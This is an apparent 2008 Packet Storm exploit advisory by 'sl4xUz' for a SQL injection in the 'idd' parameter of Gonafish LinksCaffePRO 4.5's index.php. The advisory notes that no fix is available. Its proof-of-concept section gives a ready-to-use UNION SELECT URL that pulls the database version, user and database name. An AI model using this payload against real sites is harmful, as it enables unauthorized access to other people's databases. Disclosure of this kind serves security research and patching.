gonafish-sql.txt

2008-09-16T00:00:00
ID PACKETSTORM:70028
Type packetstorm
Reporter sl4xUz
Modified 2008-09-16T00:00:00

Description

                                        
                                            `###########################################################  
#   
# ___ __ __ __ __   
# /\_ \ /\ \\ \ /\ \/\ \   
# ____\//\ \ \ \ \\ \ __ _ __ _\ \ \ \ \ ____   
# /',__\ \ \ \ \ \ \\ \_ /\ \/'\\ \/'\\ \ \ \ \/\_ ,`\   
# /\__, `\ \_\ \_\ \__ ,__\\> <\\> <\\ \ \_\ \/_/ /_   
# \/\____/ /\____\\/_/\_\_//\_/\_\\_/\_\ \ \_____\/\____\  
# \/___/ \/____/ \/_/ \//\/_///\/_/ \/_____/\/____/  
#   
# security breakd0wn!  
###########################################################  
#   
# Title: Gonafish LinksCaffePRO 4.5 (index.php) SQL Injection Vulnerability  
# Vendor: http://gonafish.com/  
# Vulnerable Version: 4.5  
# Fix: N/A  
#   
###########################################################  
#   
# disc0vered: sl4xUz  
# c0ntact: sl4x.xuz[at]gmail[dot]com  
# d0rk: "negative"  
# stop lammo  
#   
###########################################################  
  
######################  
1. Information  
######################  
LinksCaffePRO is a MySQL database driven link indexing script written in PHP 4. Using the admin script you have full control to add/modify/remove any link(s) or categorie(s).  
  
######################  
2. Vulnerabilities  
######################  
SQL Injection in "index.php" in the "idd" parameter.  
  
######################  
3. PoC  
######################  
http://localhost/path/index.php?action=deadlink&idd=-1+union+select+1,2,version(),4,concat(user(),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--  
  
###########################################################  
  
`